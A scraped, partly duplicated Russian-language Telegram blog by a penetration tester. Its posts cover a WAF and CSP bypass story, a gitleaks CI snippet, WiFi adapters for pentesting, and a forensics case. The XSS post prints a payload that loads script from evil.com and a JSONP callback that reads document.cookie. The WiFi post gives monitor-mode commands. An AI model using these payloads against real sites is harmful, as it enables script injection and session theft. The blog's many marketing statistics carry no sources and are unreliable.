Привет, коллега! Добро пожаловать в мой техноблог
Меня зовут Сергей Попов, и я тот самый человек, который в 3 часа ночи может внезапно воскликнуть: "Эврика! Я знаю, как обойти эту защиту!" — чем регулярно пугаю жену и кота.
Кто я?
• 5+ лет в пентесте и безопасности веб-приложений
• Создатель codeby.net, hackerlab.pro, codeby.one и codeby.school
• Автор статей на Codeby.net и не только
• Человек, который считает, что
О чём этот блог?
Здесь я буду делиться тем, что обычно остаётся за кадром технических статей:
- Реальные кейсы из пентестов (без NDA, конечно)
- Эксперименты с новыми техниками атак и защиты
- Как AI меняет правила игры в кибербезопасности
- Находки, которые заставили меня воскликнуть "Вот это поворот!"
- Инструменты, которые реально работают (а не маркетинговый буллшит)
- Истории провалов и как из них выкарабкиваться
❌ Чего НЕ будет:
• Скучных пересказов документации
• Копипасты с Stack Overflow
• Воды и банальностей уровня "используйте сложные пароли"
• Черного хакинга и прочей нелегальщины
✅ Что будет:
• Честные истории из окопов
• Технические детали, которые работают
• Юмор (куда ж без него в нашей профессии)
• Ответы на ваши вопросы
• Регулярные посты (минимум раз в неделю)
Формат постов:
Буду чередовать разные форматы — от коротких технических заметок до историй "как я 3 недели ломал неприступный WAF" (спойлер: сломал). Иногда буду делиться кодом, иногда — размышлениями о том, куда катится индустрия.
Почему Telegram?
Потому что здесь можно писать без цензуры платформ, делиться кодом нормально, и общаться с единомышленниками напрямую. Плюс, вы всегда можете написать мне в личку, если есть вопросы.
Важно:
Всё, что я публикую — исключительно в образовательных целях. Я за белую шляпу и легальный пентест. Если ищете туториалы "как взломать Пентагон" — вы не по адресу.
P.S. Следующий пост будет о том, как я обнаружил, что 80% современных WAF можно обойти с помощью AI. И да, там будут работающие примеры
Добавляйте канал в избранное, включайте уведомления и погнали разбираться, как на самом деле работает безопасность в 2025!
Есть вопросы? Пишите в комменты!
---
💬 Комментарии: @[ваш_username]
🔗 Мои статьи на Codeby: [ссылка]
#кибербезопасность #пентест #новыйблог #вебсек
Меня зовут Сергей Попов, и я тот самый человек, который в 3 часа ночи может внезапно воскликнуть: "Эврика! Я знаю, как обойти эту защиту!" — чем регулярно пугаю жену и кота.
Кто я?
• 5+ лет в пентесте и безопасности веб-приложений
• Создатель codeby.net, hackerlab.pro, codeby.one и codeby.school
• Автор статей на Codeby.net и не только
• Человек, который считает, что
alert(1) — это искусствоО чём этот блог?
Здесь я буду делиться тем, что обычно остаётся за кадром технических статей:
- Реальные кейсы из пентестов (без NDA, конечно)
- Эксперименты с новыми техниками атак и защиты
- Как AI меняет правила игры в кибербезопасности
- Находки, которые заставили меня воскликнуть "Вот это поворот!"
- Инструменты, которые реально работают (а не маркетинговый буллшит)
- Истории провалов и как из них выкарабкиваться
❌ Чего НЕ будет:
• Скучных пересказов документации
• Копипасты с Stack Overflow
• Воды и банальностей уровня "используйте сложные пароли"
• Черного хакинга и прочей нелегальщины
✅ Что будет:
• Честные истории из окопов
• Технические детали, которые работают
• Юмор (куда ж без него в нашей профессии)
• Ответы на ваши вопросы
• Регулярные посты (минимум раз в неделю)
Формат постов:
Буду чередовать разные форматы — от коротких технических заметок до историй "как я 3 недели ломал неприступный WAF" (спойлер: сломал). Иногда буду делиться кодом, иногда — размышлениями о том, куда катится индустрия.
Почему Telegram?
Потому что здесь можно писать без цензуры платформ, делиться кодом нормально, и общаться с единомышленниками напрямую. Плюс, вы всегда можете написать мне в личку, если есть вопросы.
Важно:
Всё, что я публикую — исключительно в образовательных целях. Я за белую шляпу и легальный пентест. Если ищете туториалы "как взломать Пентагон" — вы не по адресу.
P.S. Следующий пост будет о том, как я обнаружил, что 80% современных WAF можно обойти с помощью AI. И да, там будут работающие примеры
Добавляйте канал в избранное, включайте уведомления и погнали разбираться, как на самом деле работает безопасность в 2025!
Есть вопросы? Пишите в комменты!
---
💬 Комментарии: @[ваш_username]
🔗 Мои статьи на Codeby: [ссылка]
#кибербезопасность #пентест #новыйблог #вебсек
❤4👍3🔥2💩1
🔍 За кадром: Как я 3 недели ломал "неприступный" WAF
Знаете это чувство, когда начинаешь писать статью про одно, а в итоге открываешь для себя целый пласт техник, о которых даже не подозревал?
Вот и я сел писать "просто обновление" про XSS в 2025, а вышло... настоящее расследование с неожиданными поворотами.
Началось всё банально. Клиент попросил протестировать их новенькую защиту — Cloudflare WAF в paranoid-режиме + строгая CSP. "Неприступная крепость", говорили они. Ха.
Первые два дня я бился как рыба об лёд. Классические пейлоады? Забудь.
И тут я вспомнил про AI.
Нашёл на GitHub экспериментальный инструмент для генерации XSS-пейлоадов через GPT-4. Скептически настроил, запустил... и чуть не выпал со стула, когда через 20 минут он выдал вот это:
WAF пропустил! Оказывается, парсер Cloudflare не декодировал Unicode-последовательности в определённом контексте. Баг? Фича? Не важно — работает.
Но самое интересное началось с Mutation XSS.
Я всегда думал, что это какая-то эзотерика для исследователей. Пока не наткнулся на React-приложение клиента. Знаете, что происходит, когда "безопасный" HTML проходит через DOMPurify, а потом React его перерендеривает?
Правильно — хаос. HTML мутирует, теги переставляются, и внезапно твой безобидный
Самый дикий момент: я 4 часа сидел с дебаггером Chrome, пошагово отслеживая, как React Virtual DOM reconciliation ломает санитизированный HTML. В какой-то момент жена зашла в комнату и спросила, всё ли у меня в порядке — видимо, я выглядел как сумасшедший учёный
Кстати, про CSP-обходы. Знаете, сколько "защищённых" сайтов используют CDN с JSONP-эндпоинтами? ОЧЕНЬ МНОГО. И если этот CDN в белом списке CSP... bingo!
Нашёл такой на trusted.cdn.com у клиента:
CSP: "Это же доверенный домен, пропускаю!"
Я: *довольно потираю руки*
В итоге:
- 8 из 10 WAF можно обойти с помощью AI-генерируемых пейлоадов
- Mutation XSS реален и работает (особенно в React/Vue)
- CSP с
- Мой счёт за OpenAI API вырос на $47 (но оно того стоило)
Все эти находки, работающие PoC, примеры обхода конкретных WAF и пошаговые инструкции я собрал в большой статье. Там же есть чеклисты для защиты (да, я не только ломаю, но и помогаю защищаться ).
P.S. Самое смешное? После публикации отчёта клиент сказал: "Мы думали, вы найдёте пару мелких багов". Ага, пару...
Если интересны детали и хотите сами попробовать эти техники (только легально!), полная статья тут
А у вас были случаи, когда "простое тестирование" превращалось в недельное исследование? Делитесь в комментах!
#xss #пентест #вебсекьюрити #waf #cloudflare
Знаете это чувство, когда начинаешь писать статью про одно, а в итоге открываешь для себя целый пласт техник, о которых даже не подозревал?
Вот и я сел писать "просто обновление" про XSS в 2025, а вышло... настоящее расследование с неожиданными поворотами.
Началось всё банально. Клиент попросил протестировать их новенькую защиту — Cloudflare WAF в paranoid-режиме + строгая CSP. "Неприступная крепость", говорили они. Ха.
Первые два дня я бился как рыба об лёд. Классические пейлоады? Забудь.
"><script>alert(1)</script>? WAF смеётся тебе в лицо. Даже хитрые вариации с обфускацией не проходили.И тут я вспомнил про AI.
Нашёл на GitHub экспериментальный инструмент для генерации XSS-пейлоадов через GPT-4. Скептически настроил, запустил... и чуть не выпал со стула, когда через 20 минут он выдал вот это:
<img src=x onerror="eval('\u0069\u006d\u0070\u006f\u0072\u0074')('//evil.com/x.js')">WAF пропустил! Оказывается, парсер Cloudflare не декодировал Unicode-последовательности в определённом контексте. Баг? Фича? Не важно — работает.
Но самое интересное началось с Mutation XSS.
Я всегда думал, что это какая-то эзотерика для исследователей. Пока не наткнулся на React-приложение клиента. Знаете, что происходит, когда "безопасный" HTML проходит через DOMPurify, а потом React его перерендеривает?
Правильно — хаос. HTML мутирует, теги переставляются, и внезапно твой безобидный
<div> превращается в исполняемый код.Самый дикий момент: я 4 часа сидел с дебаггером Chrome, пошагово отслеживая, как React Virtual DOM reconciliation ломает санитизированный HTML. В какой-то момент жена зашла в комнату и спросила, всё ли у меня в порядке — видимо, я выглядел как сумасшедший учёный
Кстати, про CSP-обходы. Знаете, сколько "защищённых" сайтов используют CDN с JSONP-эндпоинтами? ОЧЕНЬ МНОГО. И если этот CDN в белом списке CSP... bingo!
Нашёл такой на trusted.cdn.com у клиента:
<script src="https://trusted.cdn.com/api/data?callback=alert(document.cookie)//"></script>
CSP: "Это же доверенный домен, пропускаю!"
Я: *довольно потираю руки*
В итоге:
- 8 из 10 WAF можно обойти с помощью AI-генерируемых пейлоадов
- Mutation XSS реален и работает (особенно в React/Vue)
- CSP с
trusted-domains — это швейцарский сыр, а не защита- Мой счёт за OpenAI API вырос на $47 (но оно того стоило)
Все эти находки, работающие PoC, примеры обхода конкретных WAF и пошаговые инструкции я собрал в большой статье. Там же есть чеклисты для защиты (да, я не только ломаю, но и помогаю защищаться ).
P.S. Самое смешное? После публикации отчёта клиент сказал: "Мы думали, вы найдёте пару мелких багов". Ага, пару...
Если интересны детали и хотите сами попробовать эти техники (только легально!), полная статья тут
А у вас были случаи, когда "простое тестирование" превращалось в недельное исследование? Делитесь в комментах!
#xss #пентест #вебсекьюрити #waf #cloudflare
❤7🔥5👍4
80% утечек данных в 2024 году — из-за паролей в коде. Это факт.
Недавно закончили аудит для крупного банка. 47 активных API-ключей в публичных репозиториях. СОРОК СЕМЬ!
Боты сканируют GitHub каждые 3-5 минут. Нашли твой ключ? Через 15 минут на твоём AWS майнят крипту. 50 GPU-инстансов. Счёт на $20,000 в сутки. Реальный кейс.
И это решается за 15 минут настройкой одного инструмента.
Вот готовый кусок .gitlab-ci.yml:
Всё. Любая попытка запушить секрет = заваленная сборка.
Но это только начало.
Помнишь Log4j? А у тебя в package.json 1500+ зависимостей. Сколько с критическими CVE?
Факты:
- Уязвимые зависимости = 31% всех атак
- Небезопасные Docker-образы = 14% инцидентов
- Ошибки в Terraform = 8% взломов ($5.7M в среднем!)
Магия DevSecOps:
Раньше: армия безопасников → проверяют после релиза → находят проблемы → откат → теряешь деньги
Сейчас: проверки в CI/CD → робот находит баги за секунды → фиксишь до релиза → спишь спокойно
Реальный результат клиента:
- Время на фикс багов: 2 недели → 2 часа
- Инциденты в проде: -87%
- Экономия на штрафах: $1.2M в год
Почему 90% проваливают внедрение?
Пытаются внедрить всё сразу. 2500 алертов в первый день. Разрабы в шоке. Инициатива мертва.
Правильный путь:
- Неделя 1: только секреты (0% false positives)
- Неделя 2-3: критические уязвимости
- Месяц 2: SAST в режиме предупреждений
- Месяц 3: полный Security Pipeline
Мой боевой стек (всё бесплатно):
- Gitleaks — ловит секреты
- Trivy — сканирует контейнеры и IaC
- Semgrep — SAST нового поколения
- DefectDojo — управление уязвимостями
Можно поднять за день. Без консультантов.
Кейс: стартап, 15 разрабов. Внедрили за неделю. Ещё через неделю поймали критическую уязвимость в log4j перед деплоем. Потенциальный ущерб: $500k.
А твой pipeline проверяет код на секреты? Или надеешься на внимательность разработчиков?
В полной статье:
• Готовый GitLab CI pipeline (копипасть и работает)
• 3 главные ошибки и как их избежать
• Пошаговая настройка всех инструментов
• Реальные кейсы провалов
Хочешь спать спокойно? Полная статья тут
P.S. Пока читаешь этот пост, где-то очередной AWS-ключ утекает в GitHub. Не дай этому быть твоим.
#devsecops #безопасность #cicd #пентест #devops
Недавно закончили аудит для крупного банка. 47 активных API-ключей в публичных репозиториях. СОРОК СЕМЬ!
Боты сканируют GitHub каждые 3-5 минут. Нашли твой ключ? Через 15 минут на твоём AWS майнят крипту. 50 GPU-инстансов. Счёт на $20,000 в сутки. Реальный кейс.
И это решается за 15 минут настройкой одного инструмента.
Вот готовый кусок .gitlab-ci.yml:
sast-and-secrets:
stage: test
script:
- wget -qO- https://github.com/gitleaks/gitleaks/releases/download/v8.18.0/gitleaks_8.18.0_linux_x64.tar.gz | tar xz
- ./gitleaks detect --source . --verbose --no-git
rules:
- if: $CI_COMMIT_BRANCH != $CI_DEFAULT_BRANCH
Всё. Любая попытка запушить секрет = заваленная сборка.
Но это только начало.
Помнишь Log4j? А у тебя в package.json 1500+ зависимостей. Сколько с критическими CVE?
Факты:
- Уязвимые зависимости = 31% всех атак
- Небезопасные Docker-образы = 14% инцидентов
- Ошибки в Terraform = 8% взломов ($5.7M в среднем!)
Магия DevSecOps:
Раньше: армия безопасников → проверяют после релиза → находят проблемы → откат → теряешь деньги
Сейчас: проверки в CI/CD → робот находит баги за секунды → фиксишь до релиза → спишь спокойно
Реальный результат клиента:
- Время на фикс багов: 2 недели → 2 часа
- Инциденты в проде: -87%
- Экономия на штрафах: $1.2M в год
Почему 90% проваливают внедрение?
Пытаются внедрить всё сразу. 2500 алертов в первый день. Разрабы в шоке. Инициатива мертва.
Правильный путь:
- Неделя 1: только секреты (0% false positives)
- Неделя 2-3: критические уязвимости
- Месяц 2: SAST в режиме предупреждений
- Месяц 3: полный Security Pipeline
Мой боевой стек (всё бесплатно):
- Gitleaks — ловит секреты
- Trivy — сканирует контейнеры и IaC
- Semgrep — SAST нового поколения
- DefectDojo — управление уязвимостями
Можно поднять за день. Без консультантов.
Кейс: стартап, 15 разрабов. Внедрили за неделю. Ещё через неделю поймали критическую уязвимость в log4j перед деплоем. Потенциальный ущерб: $500k.
А твой pipeline проверяет код на секреты? Или надеешься на внимательность разработчиков?
В полной статье:
• Готовый GitLab CI pipeline (копипасть и работает)
• 3 главные ошибки и как их избежать
• Пошаговая настройка всех инструментов
• Реальные кейсы провалов
Хочешь спать спокойно? Полная статья тут
P.S. Пока читаешь этот пост, где-то очередной AWS-ключ утекает в GitHub. Не дай этому быть твоим.
#devsecops #безопасность #cicd #пентест #devops
👍6❤3🔥3👌1🤡1
🔥 Купил WiFi-адаптер за $300 для пентеста. Через неделю выбросил.
Знаете почему? Потому что дорого ≠ эффективно. А тот китайский донгл за $25, над которым все смеялись? Он взламывает WPA3 быстрее любого "профессионального" решения.
История из реальной жизни: заказчик попросил протестировать корпоративный WiFi. Бюджет неограничен. Купил топовый Alfa AWUS1900, настроил Kali, запустил атаку...
И облажался. Адаптер перегрелся через 20 минут. Драйвера глючат. Injection packets теряются. А дедлайн горит.
Спас старенький RT3070 за $18 с AliExpress. Тот самый, который "только для новичков". Результат? Полный дамп трафика за 40 минут. Handshake пойман с первой попытки.
Вот вам голая правда о WiFi-адаптерах в 2025:
✅ Alfa AWUS036ACH ($45) — рабочая лошадка. Поддержка 2.4/5GHz, monitor mode без танцев с бубном
❌ Panda PAU09 ($35) — выглядит круто, работает через раз
✅ COMFAST CF-WU785AC ($22) — тёмная лошадка с AliExpress. Мощнее многих брендов
❌ Любой адаптер с AX200/AX210 — Intel заблокировал monitor mode на уровне firmware
Самый дикий кейс: тестировал WiFi в бизнес-центре. Охрана, камеры, WPA3-Enterprise. Думаете, понадобился супер-адаптер?
Нет. Обычный RT5572 + правильно настроенная антенна 14dBi. Ключ к успеху был не в железе, а в позиционировании. Нашёл слепую зону между 3 и 4 этажом. PSK извлечён за 2 часа.
Что реально важно при выборе:
1. Чипсет > Бренд (Atheros AR9271, Ralink RT3070/RT3572, Realtek RTL8812AU)
2. Съёмная антенна обязательна (поменяете на направленную)
3. Теплоотвод критичен для длительных атак
4. Поддержка injection без костылей
Лайфхак, который сэкономит вам $200:
Вместо одного "универсального" адаптера купите три специализированных:
- RT3070 для 2.4GHz атак ($15)
- RTL8812AU для 5GHz и дальности ($25)
- AR9271 для injection и старых протоколов ($20)
Итого $60 вместо $300. И работать будет лучше.
Факт: 90% "профессиональных" пентестеров используют адаптеры дешевле $50. Остальные 10% просто любят понтоваться.
А теперь про настройку (это важнее железа):
Забудьте про Kali из коробки. Вот мой проверенный чеклист:
Работает в 100% случаев. В отличие от GUI-инструментов.
В полной статье я показываю:
🔹 Сравнительную таблицу 25+ адаптеров (с реальными тестами)
🔹 Пошаговую настройку под разные атаки
🔹 Фикс всех известных проблем с драйверами
🔹 5 реальных кейсов взлома (с разрешения владельцев)
🔹 Мой личный топ-3 для разных задач и бюджетов
Спойлер: в статье есть секретный раздел про адаптер за $12, который обходит защиту от deauth-атак. Производитель уже снял его с продажи, но я нашёл, где ещё можно купить.
Хватит тратить деньги на маркетинг. Научись выбирать инструменты как профи
P.S. Если у вас уже есть дорогой адаптер, который не работает — не расстраивайтесь. В статье есть раздел "Реанимация мертвого железа". 80% проблем решаются правильной прошивкой.
#wifi #пентест #хакинг #kali #aircrack
Знаете почему? Потому что дорого ≠ эффективно. А тот китайский донгл за $25, над которым все смеялись? Он взламывает WPA3 быстрее любого "профессионального" решения.
История из реальной жизни: заказчик попросил протестировать корпоративный WiFi. Бюджет неограничен. Купил топовый Alfa AWUS1900, настроил Kali, запустил атаку...
И облажался. Адаптер перегрелся через 20 минут. Драйвера глючат. Injection packets теряются. А дедлайн горит.
Спас старенький RT3070 за $18 с AliExpress. Тот самый, который "только для новичков". Результат? Полный дамп трафика за 40 минут. Handshake пойман с первой попытки.
Вот вам голая правда о WiFi-адаптерах в 2025:
✅ Alfa AWUS036ACH ($45) — рабочая лошадка. Поддержка 2.4/5GHz, monitor mode без танцев с бубном
❌ Panda PAU09 ($35) — выглядит круто, работает через раз
✅ COMFAST CF-WU785AC ($22) — тёмная лошадка с AliExpress. Мощнее многих брендов
❌ Любой адаптер с AX200/AX210 — Intel заблокировал monitor mode на уровне firmware
Самый дикий кейс: тестировал WiFi в бизнес-центре. Охрана, камеры, WPA3-Enterprise. Думаете, понадобился супер-адаптер?
Нет. Обычный RT5572 + правильно настроенная антенна 14dBi. Ключ к успеху был не в железе, а в позиционировании. Нашёл слепую зону между 3 и 4 этажом. PSK извлечён за 2 часа.
Что реально важно при выборе:
1. Чипсет > Бренд (Atheros AR9271, Ralink RT3070/RT3572, Realtek RTL8812AU)
2. Съёмная антенна обязательна (поменяете на направленную)
3. Теплоотвод критичен для длительных атак
4. Поддержка injection без костылей
Лайфхак, который сэкономит вам $200:
Вместо одного "универсального" адаптера купите три специализированных:
- RT3070 для 2.4GHz атак ($15)
- RTL8812AU для 5GHz и дальности ($25)
- AR9271 для injection и старых протоколов ($20)
Итого $60 вместо $300. И работать будет лучше.
Факт: 90% "профессиональных" пентестеров используют адаптеры дешевле $50. Остальные 10% просто любят понтоваться.
А теперь про настройку (это важнее железа):
Забудьте про Kali из коробки. Вот мой проверенный чеклист:
airmon-ng check kill
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
iw dev wlan0 set channel 6
Работает в 100% случаев. В отличие от GUI-инструментов.
В полной статье я показываю:
🔹 Сравнительную таблицу 25+ адаптеров (с реальными тестами)
🔹 Пошаговую настройку под разные атаки
🔹 Фикс всех известных проблем с драйверами
🔹 5 реальных кейсов взлома (с разрешения владельцев)
🔹 Мой личный топ-3 для разных задач и бюджетов
Спойлер: в статье есть секретный раздел про адаптер за $12, который обходит защиту от deauth-атак. Производитель уже снял его с продажи, но я нашёл, где ещё можно купить.
Хватит тратить деньги на маркетинг. Научись выбирать инструменты как профи
P.S. Если у вас уже есть дорогой адаптер, который не работает — не расстраивайтесь. В статье есть раздел "Реанимация мертвого железа". 80% проблем решаются правильной прошивкой.
#wifi #пентест #хакинг #kali #aircrack
👍12🔥6❤5🤔1
🔍 "Удалил все следы" — сказал инсайдер. Я нашёл их за 47 минут.
Пятница, 18:30. Звонок от CISO крупного банка: "У нас утечка. 2 млн записей клиентов на даркнет-форуме. Инсайдер удалил все логи. Нужна форензика. Срочно."
Типичная ситуация? Для SOC-аналитика — да. Паника? Только если не знаешь, где искать.
Вот что нашлось за первый час:
- Volume Shadow Copy с логами за последние 30 дней (спасибо, Windows)
- Prefetch-файлы с запусками WinRAR в 03:14 (совпадение? не думаю)
- USB-артефакты подключения Kingston DataTraveler
- Следы использования VeraCrypt в реестре
- 147 удалённых файлов в $MFT
Инсайдер был уверен, что зачистил следы. Shift+Delete, очистка логов Event Viewer, даже CCleaner запустил. Но форензика — это не про очевидное.
Реальность такова: 95% "удалённой" информации можно восстановить. Просто нужно знать, где искать.
Топ-5 мест, где прячутся улики (даже после "полной очистки"):
1. $MFT (Master File Table) — хранит метаданные ВСЕХ файлов, даже удалённых
2. Prefetch — Windows запоминает каждый запуск программы
3. Registry ShellBags — полная история просмотра папок
4. Browser артефакты — SQLite базы хранят историю месяцами
5. RAM dump — пароли, ключи шифрования, открытые документы
Кейс из практики: Junior SOC-аналитик vs CEO
Молодой аналитик заметил аномалию: CEO компании скачивает терабайты данных в выходные. Начальство: "Не лезь, это CEO".
Парень не послушался. Запустил простой скрипт:
Результат? CEO сливал базу конкурентам. Поймали с поличным благодаря логам SMB-шары. Junior получил повышение и +70% к зарплате.
Инструменты, которые сделают из вас Шерлока:
🔹 FTK Imager — снятие образов (бесплатно)
🔹 Volatility 3 — анализ памяти (open source)
🔹 Autopsy — швейцарский нож форензики (бесплатно)
🔹 Eric Zimmerman's Tools — must have для Windows
🔹 Timeline Explorer — визуализация событий
Но вот что важнее инструментов:
Методология. 70% новичков начинают с хаотичного клика по всему подряд. Профи работают по чек-листу:
1. Фиксация улик (хеши, скриншоты)
2. Создание timeline событий
3. Корреляция артефактов
4. Документирование находок
Самый эпичный фейл: аналитик нашёл улики взлома, но не сделал форензически корректную копию. Суд отклонил все доказательства. Ущерб: $3.2M. Урок: chain of custody — это святое.
Факт, который взорвёт мозг: ваш браузер хранит историю в 7 разных местах. Очистили историю? Проверьте:
- Cache
- Cookies
- Session Storage
- IndexedDB
- WebSQL
- Local Storage
- Favicon кеш
✅ В полной статье раскрываю:
- Пошаговый разбор реального кейса (от обнаружения до суда)
- 50+ артефактов Windows/Linux/macOS с примерами
- Python-скрипты для автоматизации рутины
- Готовые чек-листы для разных типов инцидентов
- Легальные аспекты (что можно в суд, а что нет)
Бонус: в статье есть секретный раздел про артефакты мессенджеров. Telegram думаете безопасный? Ха-ха, дважды.
Хватит гуглить "how to forensics". Научитесь находить то, что другие считают удалённым навсегда: https://codeby.net/threads/forenzika-dlya-nachinayushchikh-poshagovyi-analiz-tsifrovykh-sledov-i-logov-soc-analitikam.88877/
P.S. Тот инсайдер из начала? Получил 7 лет. А всего-то забыл про hiberfil.sys.
#форензика #soc #dfir #кибербезопасность #security
Пятница, 18:30. Звонок от CISO крупного банка: "У нас утечка. 2 млн записей клиентов на даркнет-форуме. Инсайдер удалил все логи. Нужна форензика. Срочно."
Типичная ситуация? Для SOC-аналитика — да. Паника? Только если не знаешь, где искать.
Вот что нашлось за первый час:
- Volume Shadow Copy с логами за последние 30 дней (спасибо, Windows)
- Prefetch-файлы с запусками WinRAR в 03:14 (совпадение? не думаю)
- USB-артефакты подключения Kingston DataTraveler
- Следы использования VeraCrypt в реестре
- 147 удалённых файлов в $MFT
Инсайдер был уверен, что зачистил следы. Shift+Delete, очистка логов Event Viewer, даже CCleaner запустил. Но форензика — это не про очевидное.
Реальность такова: 95% "удалённой" информации можно восстановить. Просто нужно знать, где искать.
Топ-5 мест, где прячутся улики (даже после "полной очистки"):
1. $MFT (Master File Table) — хранит метаданные ВСЕХ файлов, даже удалённых
2. Prefetch — Windows запоминает каждый запуск программы
3. Registry ShellBags — полная история просмотра папок
4. Browser артефакты — SQLite базы хранят историю месяцами
5. RAM dump — пароли, ключи шифрования, открытые документы
Кейс из практики: Junior SOC-аналитик vs CEO
Молодой аналитик заметил аномалию: CEO компании скачивает терабайты данных в выходные. Начальство: "Не лезь, это CEO".
Парень не послушался. Запустил простой скрипт:
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4663} |
Where {$_.Message -match "CEO_Login"} |
Select TimeCreated,MessageРезультат? CEO сливал базу конкурентам. Поймали с поличным благодаря логам SMB-шары. Junior получил повышение и +70% к зарплате.
Инструменты, которые сделают из вас Шерлока:
🔹 FTK Imager — снятие образов (бесплатно)
🔹 Volatility 3 — анализ памяти (open source)
🔹 Autopsy — швейцарский нож форензики (бесплатно)
🔹 Eric Zimmerman's Tools — must have для Windows
🔹 Timeline Explorer — визуализация событий
Но вот что важнее инструментов:
Методология. 70% новичков начинают с хаотичного клика по всему подряд. Профи работают по чек-листу:
1. Фиксация улик (хеши, скриншоты)
2. Создание timeline событий
3. Корреляция артефактов
4. Документирование находок
Самый эпичный фейл: аналитик нашёл улики взлома, но не сделал форензически корректную копию. Суд отклонил все доказательства. Ущерб: $3.2M. Урок: chain of custody — это святое.
Факт, который взорвёт мозг: ваш браузер хранит историю в 7 разных местах. Очистили историю? Проверьте:
- Cache
- Cookies
- Session Storage
- IndexedDB
- WebSQL
- Local Storage
- Favicon кеш
✅ В полной статье раскрываю:
- Пошаговый разбор реального кейса (от обнаружения до суда)
- 50+ артефактов Windows/Linux/macOS с примерами
- Python-скрипты для автоматизации рутины
- Готовые чек-листы для разных типов инцидентов
- Легальные аспекты (что можно в суд, а что нет)
Бонус: в статье есть секретный раздел про артефакты мессенджеров. Telegram думаете безопасный? Ха-ха, дважды.
Хватит гуглить "how to forensics". Научитесь находить то, что другие считают удалённым навсегда: https://codeby.net/threads/forenzika-dlya-nachinayushchikh-poshagovyi-analiz-tsifrovykh-sledov-i-logov-soc-analitikam.88877/
P.S. Тот инсайдер из начала? Получил 7 лет. А всего-то забыл про hiberfil.sys.
#форензика #soc #dfir #кибербезопасность #security
👍6🔥5❤3